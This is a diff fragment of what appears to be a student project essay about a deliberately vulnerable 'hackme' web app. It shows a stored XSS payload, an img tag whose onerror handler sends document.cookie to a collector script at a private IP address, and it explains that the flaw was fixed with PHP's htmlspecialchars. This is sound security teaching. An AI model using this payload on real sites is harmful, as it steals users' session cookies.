BoringCode/hackme/project-essay.md

 <img src="fdfjkdfjfkjdfdf.dfdjf" onerror="this.src=\'http://10.121.20.103/hackme-xss.php?c=\' + document.cookie">
 ```

-You can view the result of this attack by visiting http://10.121.20.103/hackme-xss.php.
+If you're on the Taylor University network, you can view the result of this attack by visiting [http://10.121.20.103/hackme-xss.php](10.121.20.103/hackme-xss.php)

 In order to fix this, I disabled all usage of HTML in messages by using the `htmlspecialchars` function in PHP when rendering the user submitted content.